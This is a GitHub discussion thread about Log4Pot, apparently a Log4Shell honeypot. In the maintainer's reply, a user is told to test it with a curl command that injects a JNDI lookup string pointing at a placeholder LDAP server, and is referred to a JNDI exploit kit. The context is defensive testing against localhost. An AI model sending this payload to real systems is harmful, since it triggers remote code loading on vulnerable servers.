### DISCUSSION TITLE
Welcome to Log4Pot Discussions!

### DISCUSSION THREAD

**Discussion by thomaspatzke** [thomaspatzke/Log4Pot#15] [Announcements]
## 👋 Welcome!
  We’re using Discussions as a place to connect with other members of our community. We hope that you:
  * Ask questions you’re wondering about.
  * Share ideas.
  * Engage with other community members.
  * Welcome others and are open-minded. Remember that this is a community we
  build together 💪.

  To get started, comment below with an introduction of yourself and tell us about what you do with this community.

**Comment by febfeb1998** [comment]
hello, I just installed log4pot, I want to know how to test this honeypot. is there a tutorial to do the test?, thanks

**Reply by thomaspatzke** [reply]
No tutorial, but testing is quite easy by providing a Log4j lookup expression with JNDI, e.g.

```
curl http://localhost -H 'X-Test: ${jndi:ldap://some.test.server}'

```

This should at least result in a log record from Log4Pot of the type "exploit". You can also use [JNDI Exploit kit](https://github.com/pimps/JNDI-Exploit-Kit) and reference it with the LDAP URL. Then Log4Pot should store the payload and the exploit class, if configured properly.
